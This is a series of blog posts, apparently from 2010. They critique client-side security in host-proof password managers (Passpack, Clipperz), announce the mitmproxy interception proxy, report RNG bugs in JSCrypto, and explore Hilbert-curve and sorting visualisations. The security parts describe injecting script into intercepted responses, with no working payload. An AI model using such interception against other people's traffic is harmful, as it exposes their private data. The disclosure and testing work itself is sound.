these points, Passpack gave up - they only publish a checksum for the offline
version of their application. This is a disastrous decision. Passpack users are
compelled to execute whatever the server passes them, without any verification
or review. If this was a sudden-death match, that would be Passpack pretty
much done right there.</p>
<h3 id="2-client-side-security-1">2: Client-side security</h3>
<p>But even if they <em>did</em> have a verification mechanism, it still wouldn't help.
Firing up mitmproxy, our first look at the traffic seems promising. During the
login process we see JSON snippets - which can be deserialized safely - being
passed to and fro, rather than chunks of Javascript. Then we notice that the
news pane comes through as a chunk of HTML. When we edit the response to add a
&lt;script&gt; tag, it gets executed. Furthermore, when we click on any of the
menu buttons, gobs of Javascript are pumped into the client app and merrily
evaluated. I stopped looking at the application at this point. There's no point
showing an example of how someone in control of the server could exploit this
situation, because it's clear that preventing script injection is simply not a
design goal of the Passpack project. So, that's 0 for 2 for Passpack.</p>
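<p>The contrast with a pure JSON transport is worth making explicit - again a
sketch of the pattern, not either product's code. Parsing can only ever produce
inert data, never run it:</p>

```javascript
// A host-proof client should treat every server response as data, not code.
function handleResponse(body) {
  return JSON.parse(body); // throws on anything that isn't pure JSON
}

const msg = handleResponse('{"result": "done", "cards": 3}');
console.log(msg.result); // prints "done" - no server-supplied code has executed

// A payload that an eval-based client would happily run is simply rejected:
let rejected = false;
try {
  handleResponse('stealSecrets()'); // not valid JSON
} catch (e) {
  rejected = true; // SyntaxError - the malicious response goes nowhere
}
console.log(rejected); // true
```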
<h2 id="the-emperor-sure-looks-naked-to-me">The emperor sure looks naked to me</h2>
<p>I want to make it clear that I wish both these projects well. Their founders
have thrown their hats into the ring, and had the stones to try to make the
host-proof application paradigm work in a commercial setting. Both projects have
published significant libraries for building host-proof apps (see the <a href="http://www.clipperz.com/open_source/javascript_crypto_library">Clipperz
Javascript Crypto
Library</a>, and the
<a href="http://www.passpack.com/en/credits/">Passpack Host-Proof Hosting Library</a>) that
will undoubtedly make the road easier for those who follow in their footsteps.
It's in the interest of all freedom-loving citizens of the Internet that both
these companies prosper, because we need more host-proof applications, not
fewer. However...</p>
<p>Without a client-side that is both secure <strong>and</strong> verified in the sense I
describe above, an application simply isn't "host-proof" in any meaningful
sense. If your application is designed in such a way that you can simply
<strong>ask</strong> your user's browser for their private data, you can't say "we couldn't
access your data even if we wanted to", and you can't say "we've designed our
system so that you don't have to trust us". Now, I can anticipate some of the
response to this statement - people will say that checksum verification isn't
practical, that users wouldn't bother, that an application that sticks
rigorously to the host-proof application principles would be unusable. This
might all be true - but it's beside the point. The truth is, if someone hacked
the Clipperz or Passpack servers, they <strong>could</strong> steal bank details or server
passwords or whatever else people keep in their lockers - so we're relying on
the hosts to be secure. And like Google and Facebook, Clipperz and Passpack
<strong>could</strong> access their users' private data - they're just promising that they
won't. Just like everybody else, really.</p>
<p>Luckily, the steps required to fix things are clear. Clipperz made a critical
mistake in choosing DWR for their client-server communications, but that can be
rectified. Passpack needs to abandon its misguided idea that no verification of
the client-side application is needed, and do the work to make this possible.
Passpack already uses JSON for most of its communication - if they used it
consistently for all server communication, their client-side app could be on
solid ground. Both projects need to put on their thinking caps, and come up
with a better way to approach the client-side verification problem. I'm hopeful
that we'll see improvements from both projects in response to this post.</p>
<h2 id="up-next-building-a-minimal-host-proof-application">Up next: building a minimal host-proof application</h2>
<p>All of this started off the exhaustingly monomaniacal hamster-on-a-wheel that I
have where other people have a brain. I found myself awake at 3am, thinking
about host-proof apps, and pondering the ineluctable modalities of the
verification problem. So, I decided to spend some time building a minimal
useful host-proof application to experiment with. Tune in next week for my next
thrilling post, where I build and launch a tiny, experimental and unashamedly
user-hostile host-proof app.</p>
Introducing mitmproxy: an interactive man-in-the-middle proxy
2010-02-16T00:00:00+00:00
2010-02-16T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce0_1/
<h1> Update: see <a href="http://mitmproxy.org">mitmproxy.org</a> for recent releases!</h1>
<p>I spend a lot of time poking at web interfaces, both for penetration testing
and generally while developing software. This usually involves iteratively
making small modifications to requests, and running them again and again until
I find a vulnerability or reproduce a bug. Using a browser plugin like
<a href="https://addons.mozilla.org/en-US/firefox/addon/966">tamperdata</a> is great for a
quick first stab at things, but gets clunky quickly. Scripting things up is
usually the next step, and that's fine, but time-consuming and not very agile.</p>
<div class="media">
<a href="mitmproxy-screenshot.png">
<img src="mitmproxy-screenshot.png" />
</a>
</div>
<p>So, I'm releasing <strong>mitmproxy</strong> - an interactive, SSL-aware man-in-the-middle
proxy that lets you view, modify and replay HTTP connections. It's aimed at
software developers and penetration testers (i.e. people like me), who need to
intensively tamper with and monitor HTTP traffic. Using it, you can point your
browser at a page that loads a bazillion images and 50 snippets of JSON, pick
out the one request you're interested in, and modify and replay it over and
over. You have complete control over both requests and responses - you can edit
headers and content using your preferred text editor, and change HTTP request
methods on the fly. You can view request and response contents using an external
viewer (picked using your mailcap configuration), or using <strong>mitmproxy</strong>'s built
in text and hexdump-like viewers. Filters and intercepts are specified using
regular expressions and a pretty complete mutt-like expression language.</p>
<p>Another useful feature is something I call "sticky cookies". I often need to
make requests using an authenticated session. This is a pain when a login is
required to get at the action. Copying cookie values around or scripting up the
login process gets old
quick. So, <strong>mitmproxy</strong> lets you set cookies on requests matching a specified
expression as "sticky", which means that requests without a cookie inherit
previously seen cookie values. So, you can log in to the target site once using
your browser, and subsequent requests using tools like <strong>curl</strong> will
automagically look like they're part of an authenticated session.</p>
<p>I've just sliced <strong>mitmproxy</strong> raw and quivering out of a much larger internal
project, so expect some rough edges - please let me know if you run into any
problems.</p>
<p>You can find releases and documentation for <strong>mitmproxy</strong>
<a href="http://mitmproxy.org">here</a>. As usual, the real action is at the project's
<a href="http://github.com/cortesi/mitmproxy">git repository</a>.</p>
Timsort - a study in grayscale
2010-01-28T00:00:00+00:00
2010-01-28T00:00:00+00:00
https://corte.si/posts/code/timsort-grayscale/
<div class="media">
<a href="timsort.png">
<img src="timsort.png" />
</a>
</div>
<p>A <a href="https://corte.si/posts/code/sortvis-fruitsalad/">couple of days ago</a> I published a
set of explosion-in-a-crayola-factory colourful sorting algorithm
visualisations, using a colour sequence generated with the Hilbert curve. The
idea was that using a space-filling curve to traverse the RGB colour cube we
could get a large number of distinct but visually ordered colours. I contrasted
this with a more common method, which is to vary the intensity of a monotone to
generate a gradient of colours. A couple of people suggested that I provide a
set of grayscale images for comparison. I was curious about this too, so I
hacked a grayscale generator into <a href="http://github.com/cortesi/sortvis">sortvis</a>.
The results were striking, but not interesting enough to reproduce here in full.
Subjectively, I think the coloured images do allow you to follow more of the
detail in these dense visualisations, but I'm not wedded to the idea. Being able
to visually judge the order of elements in a sorting algorithm visualisation is
important, and that is something we sacrifice in the Hilbert RGB traversal. I
still like my <a href="https://corte.si/posts/code/visualisingsorting/">earlier sparse grayscale
visualisations</a> best.</p>
<p>If you're curious, you can check out
<a href="http://github.com/cortesi/sortvis">sortvis</a> and generate the full set of
grayscale graphs with the following command:</p>
<pre style="background-color:#2b303b;">
<code>./dense -g -n 512
</code></pre>
<p>I did think the grayscale version of Python's
<a href="https://corte.si/posts/code/timsort/">Timsort</a> was worth sharing. It's pretty
spectacular due to a purely coincidental 3d effect - not much good for
explaining Timsort, but I'd hang it on my wall, for sure.</p>
Hilbert Curve + Sorting Algorithms + Procrastination = ?
2010-01-26T00:00:00+00:00
2010-01-26T00:00:00+00:00
https://corte.si/posts/code/sortvis-fruitsalad/
<p>I like the Hilbert curve. I like sorting algorithm visualisations. I
occasionally procrastinate when I should be doing more important things. When
all these factors converge, the result is a post like this.</p>
<p>In a <a href="https://corte.si/posts/code/hilbert/portrait/">previous post</a>, I drew a picture
of a Hilbert curve by projecting a Hilbert curve traversal of the RGB colour
cube onto a Hilbert curve traversal of the plane (yes, it's a mouthful, but it's
a mouthful of awesome). Since then, I've been pondering the general utility of
Hilbert curve traversals of the colour cube. In large-scale visualisation, we
often want to choose an ordered sequence of colours that have the property that
colours close to each other on the sequence are also close to each other
visually. The easy way to do this is to restrict yourself to a specific hue, and
to vary the intensity. I used this idea in grayscale to generate some previous
<a href="https://corte.si/posts/code/visualisingsorting/">sorting algorithm visualisations</a>:</p>
<div class="media">
<a href="insertionsort.png">
<img src="insertionsort.png" />
</a>
<div class="subtitle">
Insertion sort
</div>
</div>
<p>The problem with this approach is that it hugely restricts the number of
distinct colours we can use. There are only so many distinct shades of gray the
human eye can perceive - I'm already pushing it with 20 distinct colours in the
image above. We can do much, much better using the Hilbert curve. Let's assume
that human perception of RGB colours is uniform and consistent - that is, that
any change along the RGB axes will result in uniformly proportional difference
in perceived colour. This assumption is incorrect, but it's good enough as a
first approximation. By traversing the RGB colour cube in Hilbert order, we can
get a set of colours that are maximally distinct from each other, with
near-optimal colour locality preservation (keeping in mind that perfect
locality preservation is impossible). In other words, an equidistant sequence
of colours that are simultaneously as different from each other as possible,
and where colours 'close' to each other on the sequence are as similar as
possible. The result is a colour sequence that looks like this:</p>
<div class="media">
<a href="swatch.png">
<img src="swatch.png" />
</a>
<div class="subtitle">
512-colour Hilbert-order swatch
</div>
</div>
<p>We do, of course, pay a price for this mathematical marvel: we can't visually
compare colours and see their order in the spectrum. When we really want a
large ordered sequence of colours, this can be an acceptable tradeoff.</p>
<p>Below is a re-imagining of my previous sorting algorithm visualisations, at a
much larger scale than I could achieve using shades of gray. Each image shows a
random list of 512 elements being sorted. The images are at a 1-pixel per
element resolution, and each element has a distinct colour along the Hilbert
RGB cube traversal. The aspect ratios differ, because the width of the images
are equal to the number of element swaps that occur during the sorting process.
I've left out a number of algorithms that end up being too "wide" to be
enjoyable - shellsort and bubblesort, I'm looking at you. Oh, and I make
absolutely no claims that these particular visualisations are useful or
informative. I made them for the same reason Mallory climbed Everest and the
chicken crossed the road: because it's there, and to see what's on the other
side. Come to think of it, the Mallory-Chicken Impetus explains rather a lot of
what I do.</p>
<h3 id="selection-sort">Selection sort</h3>
<div class="media">
<a href="selectionsort.png">
<img src="selectionsort.png" />
</a>
<div class="subtitle">
Selection sort
</div>
</div>
<h2 id="insertion-sort">Insertion sort</h2>
<div class="media">
<a href="insertionsort.png">
<img src="insertionsort.png" />
</a>
<div class="subtitle">
Insertion sort
</div>
</div>
<h3 id="python-s-timsort">Python's Timsort</h3>
<p>I explained the pattern you see below in a <a href="https://corte.si/posts/code/timsort/">previous post visualising
Timsort</a>.</p>
<div class="media">
<a href="timsort.png">
<img src="timsort-small.png" />
</a>
<div class="subtitle">
Timsort
</div>
</div>
<h3 id="quicksort">Quicksort</h3>
<div class="media">
<a href="quicksort.png">
<img src="quicksort-small.png" />
</a>
<div class="subtitle">
Quicksort
</div>
</div>
<h2 id="the-code">The code</h2>
<p>As usual, I've published the code used to draw the images in this post. I
extended <a href="http://github.com/cortesi/scurve">scurve</a>, where I'm collecting
algorithms and visualisation techniques related to space-filling curves, to draw
colour swatches. Then I added a "fruitsalad" visualisation technique to
<a href="http://github.com/cortesi/sortvis">sortvis</a>, which houses my sorting algorithm
visualisation code.</p>
An email to the authors of JSCrypto
2010-01-14T00:00:00+00:00
2010-01-14T00:00:00+00:00
https://corte.si/posts/security/jscrypto/
<div class="media">
<a href="facepalm.jpg">
<img src="facepalm.jpg" />
</a>
</div>
<p><strong>[Update: A fix for these problems and one noted by Peter Burns in the comments
to this post has been posted. <a href="http://crypto.stanford.edu/sjcl/">Get it while it's
hot</a>, folks.]</strong></p>
<p>Hi folks,</p>
<p>Thanks for a <a href="http://crypto.stanford.edu/sjcl/">blazingly fast little crypto
library</a>. Please find below a few comments on
the code.</p>
<p>There's an error in the <strong>is_ready</strong> function of the random number generator.
On line 1386 of the <strong>jscrypto.js</strong> file, you have:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">return </span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">this</span><span style="color:#c0c5ce;">._pool_entropy[</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">] > </span><span style="color:#bf616a;">this</span><span style="color:#c0c5ce;">._BITS_PER_RESEED &&
new </span><span style="color:#ebcb8b;">Date</span><span style="color:#c0c5ce;">.</span><span style="color:#96b5b4;">valueOf</span><span style="color:#c0c5ce;">() > </span><span style="color:#bf616a;">this</span><span style="color:#c0c5ce;">._next_reseed) ?
</span></code></pre>
<p>This should be:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">return </span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">this</span><span style="color:#c0c5ce;">._pool_entropy[</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">] > </span><span style="color:#bf616a;">this</span><span style="color:#c0c5ce;">._BITS_PER_RESEED &&
new </span><span style="color:#ebcb8b;">Date</span><span style="color:#c0c5ce;">().</span><span style="color:#96b5b4;">valueOf</span><span style="color:#c0c5ce;">() > </span><span style="color:#bf616a;">this</span><span style="color:#c0c5ce;">._next_reseed) ?
</span></code></pre>
<p>In Safari, this will cause an error and script termination. In Firefox, the
effect is much worse - <b>new Date.valueOf()</b> returns an object, which never
compares as greater than any integer. As an unfortunate consequence, that clause
can never evaluate to true, and your <a
href="http://en.wikipedia.org/wiki/Fortuna_(PRNG)">Fortuna</a> implementation's
periodic reseeding never triggers...</p>
<p>All is not lost, though, because luckily the <strong>random_words</strong> function in which
the return value from <strong>is_ready</strong> is used makes no sense. ;-) To start with, on
line 1289 you have:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">readiness </span><span style="color:#c0c5ce;">== </span><span style="color:#bf616a;">this</span><span style="color:#c0c5ce;">.NOT_READY)
</span></code></pre>
<p>But readiness here is a bit field, and this clause will evaluate to false in
half of the situations in which <strong>is_ready</strong> actually does return NOT_READY. You
surely want</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">readiness </span><span style="color:#c0c5ce;">& </span><span style="color:#bf616a;">this</span><span style="color:#c0c5ce;">.NOT_READY)
</span></code></pre>
<p>Three lines further down, you have:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">else if </span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">readiness </span><span style="color:#c0c5ce;">&& </span><span style="color:#bf616a;">this</span><span style="color:#c0c5ce;">.REQUIRES_RESEED)
</span></code></pre>
<p>This, again, doesn't do what it seems - && is the boolean and, not the bitwise
and. Since <strong>this.REQUIRES_RESEED</strong> is simply a positive constant, that really
becomes:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">else if </span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">readiness</span><span style="color:#c0c5ce;">)
</span></code></pre>
<p>So despite the bug in <strong>is_ready</strong>, your reseeding function actually runs every
time random data is requested. Phew - who says two wrongs don't make a right,
ey? Reseeding every time data is requested might open the generator to some
interesting entropy exhaustion attacks, but is much better than not reseeding at
all.</p>
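<p>The difference between the two operators is easy to demonstrate in isolation.
Here's a minimal Python sketch with made-up flag values (jscrypto's actual
constants may differ):</p>
<pre>
```python
# Illustrative bit-field constants - not jscrypto's actual values
NOT_READY = 1
REQUIRES_RESEED = 2

# A generator that is both not ready and in need of a reseed:
readiness = NOT_READY | REQUIRES_RESEED  # == 3

# Equality misses the combined state - this is the bug:
print(readiness == NOT_READY)       # False
# A bitwise test catches it - this is the fix:
print(bool(readiness & NOT_READY))  # True
```
</pre>
<p>The same confusion applies to &amp;&amp; versus &amp;: a boolean and of two
non-zero values is always truthy, whether or not their bits actually overlap.</p>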
<p>A corollary to all this is that you also need to address the fact that the
return value from <strong>is_ready</strong> is used incorrectly in the rest of your code and
your examples. As it stands, testing for readiness with</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(</span><span style="color:#ebcb8b;">Random</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">is_ready</span><span style="color:#c0c5ce;">())
</span></code></pre>
<p>is wrong, because your readiness function can return <strong>REQUIRES_RESEED |
NOT_READY</strong>, which is a positive integer. I'd recommend changing the interface
of <strong>is_ready</strong> to have an obvious boolean return value instead, though -
typing</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(</span><span style="color:#ebcb8b;">Random</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">is_ready</span><span style="color:#c0c5ce;">() & </span><span style="color:#ebcb8b;">Random</span><span style="color:#c0c5ce;">.IS_READY)
</span></code></pre>
<p>is a bit of a mouthful.</p>
<p>Thanks again for jscrypto.</p>
<br/>
<br/>
<p>Regards,</p>
<br/>
<p>Aldo</p>
<p><strong>[No animals were harmed producing this post. Content lightly edited for
markup and formatting from the original email. Yes, I really do like JSCrypto -
this error-hiding-an-error was amusing, but the AES implementation seems good
(although the jury's still out on the SHA256 portion).]</strong></p>
Generating colour maps with space-filling curves
2010-01-07T00:00:00+00:00
2010-01-07T00:00:00+00:00
https://corte.si/posts/code/hilbert/swatches/
<p>After my post about my <a href="https://corte.si/posts/code/hilbert/portrait/">Quixotic quest to draw a portrait of the Hilbert
curve</a>, Chris Mueller pointed me to some
<a href="http://visualmotive.com/colorsort/">fascinating related work</a> he had done
generating colour maps of images. Chris's method was to extract the colours
from an image, sort them in natural order, and then draw the pixels out onto a
Hilbert curve. The results are pretty, but have a blotchiness that demonstrates
the poor clustering properties of a natural order sort nicely. If you've read my
previous post (you have, haven't you?), you'll be immediately struck by the idea
that we can improve this by sorting the pixels in order of the 3d Hilbert curve
traversal of the RGB colour cube (you were, weren't you?). This would give us
near optimal clustering, keeping similar colours together and eliminating the
blotchiness. If we have a Hilbert-order sorting of the pixels, we can also
project this onto other traversals of the pixels of the destination image. Using
the ZigZag curve I introduced in the previous post produces a very nice result
too, showing that the order in which the RGB cube is traversed is more important
than the destination map.</p>
<p>In the images below, <strong>natural</strong> is a natural-order colour sort projected onto
a Hilbert curve (Chris's method), <strong>hilbert</strong> is a Hilbert-curve order colour
sort projected onto a Hilbert curve, and <strong>zigzag</strong> is a Hilbert-curve order
colour sort projected onto a ZigZag curve. I've used the same images Chris used
to make comparison with his other interesting visualisations easy.</p>
<div class="media left">
<a href="original_candleslime.png">
<img src="original_candleslime.png" />
</a>
</div>
<div class="content">
<div class="row">
<div class="column">
<img src="natural_candleslime.png"/>
<div>natural</div>
</div>
<div class="column">
<img src="hilbert_candleslime.png"/>
<div>hilbert</div>
</div>
<div class="column">
<img src="zigzag_candleslime.png"/>
<div>zigzag</div>
</div>
</div>
</div>
<div class="media left">
<a href="original_girlpeach.png">
<img src="original_girlpeach.png" />
</a>
</div>
<div class="content">
<div class="row">
<div class="column">
<img src="natural_girlpeach.png"/>
<div>natural</div>
</div>
<div class="column">
<img src="hilbert_girlpeach.png"/>
<div>hilbert</div>
</div>
<div class="column">
<img src="zigzag_girlpeach.png"/>
<div>zigzag</div>
</div>
</div>
</div>
<div class="media left">
<a href="original_landscape.png">
<img src="original_landscape.png" />
</a>
</div>
<div class="content">
<div class="row">
<div class="column">
<img src="natural_landscape.png"/>
<div>natural</div>
</div>
<div class="column">
<img src="hilbert_landscape.png"/>
<div>hilbert</div>
</div>
<div class="column">
<img src="zigzag_landscape.png"/>
<div>zigzag</div>
</div>
</div>
</div>
<div class="media left">
<a href="original_tents.png">
<img src="original_tents.png" />
</a>
</div>
<div class="content">
<div class="row">
<div class="column">
<img src="natural_tents.png"/>
<div>natural</div>
</div>
<div class="column">
<img src="hilbert_tents.png"/>
<div>hilbert</div>
</div>
<div class="column">
<img src="zigzag_tents.png"/>
<div>zigzag</div>
</div>
</div>
</div>
<div class="media left">
<a href="original_tigersnack.png">
<img src="original_tigersnack.png" />
</a>
</div>
<div class="content">
<div class="row">
<div class="column">
<img src="natural_tigersnack.png"/>
<div>natural</div>
</div>
<div class="column">
<img src="hilbert_tigersnack.png"/>
<div>hilbert</div>
</div>
<div class="column">
<img src="zigzag_tigersnack.png"/>
<div>zigzag</div>
</div>
</div>
</div>
<h2 id="sources">Sources</h2>
<p>The images are from the Flickr Creative Commons collection. The tiger image is
© <a href="http://www.flickr.com/photos/nikonvscanon/2427517125/">David Blaikie</a>.
The girl image is © <a href="http://www.flickr.com/photos/savannahgrandfather/312427606/">Bruce
Tuten</a>. The still
life is ©
<a href="http://www.flickr.com/photos/8363028@N08/3077370592/in/photostream/">DeusXFlorida</a>.
The beach image is © <a href="http://www.flickr.com/photos/hamed/2476599906/">Hamed
Saber</a>. The tent image is
© <a href="http://www.flickr.com/photos/drusbi/1318108463/">drusbi</a>.</p>
<h2 id="the-code">The code</h2>
<p>I've updated the <a href="http://github.com/cortesi/scurve">scurve</a> project (where I'm
collecting algorithms and visualisation tools related to space-filling curves)
to include a "colormap" tool to generate colour maps. The images above were can
be generated using commands of the following form:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;"> </span><span style="color:#bf616a;">colormap -s</span><span style="color:#c0c5ce;"> 128</span><span style="color:#bf616a;"> -c </span><span style="color:#b48ead;">[</span><span style="color:#c0c5ce;">colour traversal</span><span style="color:#b48ead;">]</span><span style="color:#bf616a;"> -m </span><span style="color:#b48ead;">[</span><span style="color:#c0c5ce;">map</span><span style="color:#b48ead;">]</span><span style="color:#c0c5ce;"> src destination
</span></code></pre>
<p>There are a lot of other striking permutations and combinations to explore -
the colour traversal and destination map can be any of the space-filling curves
supported by <strong>scurve</strong>.</p>
Portrait of the Hilbert curve
2010-01-03T00:00:00+00:00
2010-01-03T00:00:00+00:00
https://corte.si/posts/code/hilbert/portrait/
<div class="media">
<a href="hilbert2d-o4.png">
<img src="hilbert2d-o4.png" />
</a>
<div class="subtitle">
Hilbert curve of order 4
</div>
</div>
<p>The <a href="http://en.wikipedia.org/wiki/Hilbert_curve">Hilbert curve</a> is a remarkable
construct in many ways, but the thing that makes it <em>useful</em> in computer science
is the fact that it has good clustering properties. If we take a curve like the
one above and straighten it out, points that are close together in the
two-dimensional layout will also tend to be close together in the linear
sequence. I say "tend to be", because we can never get this perfectly right -
we can show that any curve of this type will have some points that are close to
each other spatially but far from each other on the curve.
<a href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.37.3138&rep=rep1&type=pdf">It</a>
<a href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.129.1888&rep=rep1&type=pdf">turns</a>
<a href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.24.8236&rep=rep1&type=pdf">out</a>,
however, that the clustering behaviour of the Hilbert curve is pretty much as
good as we can currently get. For one example of how this property can be
useful, imagine that we have a database with two indexes - X and Y. We know that
we will be doing frequent queries on those indexes, asking for records where X
and Y fall within specified ranges. We can visualise this as retrieving
rectangular regions from a two-dimensional space. Given this scenario, how can
we lay out the records on disk to minimise disk access? Information on disk is
stored sequentially, so what we want is a layout that maximises the likelihood
that records in any given rectangular region will also be adjacent on disk. In
other words, what we want is a way to order our two-dimensional space of records
so that records close to each other in two dimensions also tend to be close to
each other in the sequential order. This is exactly the outstanding property of
the Hilbert curve, so one solution is to store our records on disk in Hilbert
order.</p>
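<p>A minimal sketch of that layout idea for the 2d case: compute each record's
offset along the Hilbert curve and use it as the sort (or storage) key. The
record fields below are purely illustrative, and the offset calculation is the
classic iterative algorithm in one common orientation:</p>
<pre>
```python
def hilbert_xy2d(order, x, y):
    """Map a point on a 2**order x 2**order grid to its offset along a
    2d Hilbert curve (classic iterative algorithm)."""
    n = 1 << order
    d = 0
    s = n >> 1
    while s > 0:
        rx = 1 if x & s else 0
        ry = 1 if y & s else 0
        d += s * s * ((3 * rx) ^ ry)
        # rotate/reflect so the next level of the recursion lines up
        if ry == 0:
            if rx == 1:
                x, y = n - 1 - x, n - 1 - y
            x, y = y, x
        s >>= 1
    return d

# Illustrative records with two indexed columns, laid out in Hilbert order:
records = [{"x": x, "y": y} for x in range(8) for y in range(8)]
records.sort(key=lambda r: hilbert_xy2d(3, r["x"], r["y"]))
```
</pre>
<p>Records that are adjacent in the sorted sequence are now, with high
likelihood, also close to each other in the (x, y) plane.</p>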
<h2 id="visualising-the-hilbert-curve-a-first-stab">Visualising the Hilbert curve: A first stab</h2>
<p>I've long felt that the usual visualisation of the Hilbert curve - like the one
shown at the top of this post - doesn't really do its clustering properties
justice. The lines-and-vertices approach demonstrates how to <em>construct</em> the
curve very nicely, but it doesn't give us any intuitive feel for how close
points on the curve are to each other on the plane. In the remainder of this
post, I take a stab at visualising the Hilbert curve as the great mathematician
in the sky intended - completely covering the plane, and with each pixel
visually encoding its proximity to its neighbours along the curve.</p>
<p>One way to proceed would be to find a way to assign a colour to every pixel in a
Hilbert-order traversal of a square image. Imagine the RGB colour space as a
cube where each colour is uniquely identified by a set of (r, g, b)
co-ordinates. Here's one with 20 colours to a side:</p>
<div class="media">
<a href="ccube.png">
<img src="ccube.png" />
</a>
<div class="subtitle">
A 20x20x20 RGB colour cube
</div>
</div>
<p>We'll use a somewhat larger colour cube - 256 colours to a side, giving us
16,777,216 unique colours. This colour cube is familiar to pretty much everyone,
since it's precisely the colour space we use when we specify HTML-style #rrggbb
colours. We can project the RGB colour cube at 1:1 resolution onto a square with
4096 pixels to a side - this exactly matches a Hilbert curve of order 12. Now we
need a method for traversing the colours in the colour cube. One trivial way to
do this is to simply snake through all the points in the cube. In two
dimensions, it would look like this:</p>
<div class="media">
<a href="zigzag-o4.png">
<img src="zigzag-o4.png" />
</a>
<div class="subtitle">
16x16 Zigzag
</div>
</div>
<p>This generalises to 3 or more dimensions easily - just imagine "stacking"
plates of two-dimensional traversals in such a way that one plate's end point
is adjacent to the next plate's starting point. For want of a better term, I've
called this Zigzag order. When we project a Zigzag traversal of the RGB
colourspace onto a Hilbert-order traversal of the plane, we get this:</p>
<div class="media">
<a href="hilbert-zigzag-fullsize.png">
<img src="hilbert-zigzag-small.png" />
</a>
<div class="subtitle">
Zigzag on Hilbert
</div>
</div>
<p>That's... ugly. You can vaguely make out the shape of the Hilbert curve by
dividing the image into quadrants, and traversing them in the order in which
they blend into each other. But there's a problem - if we traverse the RGB
colour space in Zigzag order, many colours that are close to each other in 3d
space - and therefore visually similar - are quite far from each other in our
traversal order. This is what causes the blotchy artifacts in the image above.
What we really want is a traversal of the RGB colour space that is as smooth and
continuous as possible - meaning that colours that are close to each other in
the cube are also as close as possible to each other in the traversal order.
Wait a minute... that sounds familiar, doesn't it?</p>
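<p>For concreteness, the Zigzag traversal itself takes only a few lines. Here's a
minimal sketch: rows snake back and forth, and whole planes alternate direction
too, so each point is adjacent to the one before it:</p>
<pre>
```python
def zigzag3d(side):
    """Visit every point of a side x side x side cube in Zigzag order,
    never jumping: rows alternate direction within a plane, and planes
    alternate direction within the cube."""
    points = []
    forward = True  # direction of the current row
    for z in range(side):
        ys = range(side) if z % 2 == 0 else reversed(range(side))
        for y in ys:
            xs = range(side) if forward else reversed(range(side))
            for x in xs:
                points.append((x, y, z))
            forward = not forward
    return points

# A 2x2x2 cube is traversed without ever jumping:
# (0,0,0) (1,0,0) (1,1,0) (0,1,0) (0,1,1) (1,1,1) (1,0,1) (0,0,1)
```
</pre>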
<h2 id="drawing-the-hilbert-curve-in-n-dimensions">Drawing the Hilbert curve in N dimensions</h2>
<p>What we really want is a 3d Hilbert curve traversal of the RGB colour cube. This
would mean that our colour clustering - making sure that similar colours are as
close as possible to each other in the sequence - would be close to optimal. We
should then see the clustering properties of the 2d Hilbert curve as patches of
similar colour. So, does a 3d analogue to the Hilbert curve exist? Sure it does - here's
a somewhat befuddling picture of an example rendered with POV-Ray:</p>
<div class="media">
<a href="hilbert3d-o3.png">
<img src="hilbert3d-o3.png" />
</a>
<div class="subtitle">
3d Hilbert curve of order 3 - the green bulb is the start of the curve
</div>
</div>
<p>We can do even better than 3 dimensions, though, by generalising the Hilbert
curve to N dimensions. Concretely, we would like to find a way to translate an
offset along the N-dimensional Hilbert curve to co-ordinates, and vice-versa.
The algorithms to do this are somewhat tricky, but are well known and widely
described. A particularly nice exposition can be found in the paper <a href="http://www.cs.dal.ca/research/techreports/cs-2006-07">"Compact
Hilbert Indices"</a> by Chris
Hamilton. This section is based on Hamilton's version of the classic algorithm
first devised by A. R. Butz in the 1970s (though, see comments in my code for
corrections to some minor errors in the paper that may trip up implementers).</p>
<p>We start with a slight detour - the surprising connection between the Hilbert
curve and <a href="http://en.wikipedia.org/wiki/Gray_code">Gray codes</a>. Recall that Gray
codes are a way to traverse all numbers of a given bit width in such a way that
only one bit differs from each value to the next. Here, for example, are the
2-bit and 3-bit Gray codes:</p>
<h3 id="2-bit">2-bit</h3>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">0, 0
0, 1
1, 1
1, 0
</span></code></pre><h3 id="3-bit">3-bit</h3>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">0, 0, 0
0, 0, 1
0, 1, 1
0, 1, 0
1, 1, 0
1, 1, 1
1, 0, 1
1, 0, 0
</span></code></pre>
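<p>These sequences are easy to produce: the i-th value of the binary-reflected
Gray code is simply i ^ (i &gt;&gt; 1). A minimal sketch:</p>
<pre>
```python
def gray_code(bits):
    """Yield the binary-reflected Gray code sequence for a given bit
    width. Consecutive values differ in exactly one bit."""
    for i in range(1 << bits):
        yield i ^ (i >> 1)

def as_bits(value, width):
    """Unpack an integer into a tuple of bits, most significant first."""
    return tuple((value >> (width - 1 - i)) & 1 for i in range(width))

# Reproduces the 2-bit table above:
print([as_bits(g, 2) for g in gray_code(2)])
# [(0, 0), (0, 1), (1, 1), (1, 0)]
```
</pre>
<p>The same two functions produce the 3-bit table, and the sequence for any
larger width.</p>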
<p>Now, watch what happens when we treat each set of bits in the N-bit Gray code
as co-ordinates in N-dimensional space (with X being the rightmost bit), and
draw the resulting curves:</p>
<table class="spacertable">
<tr>
<th width="50%">
2-bit
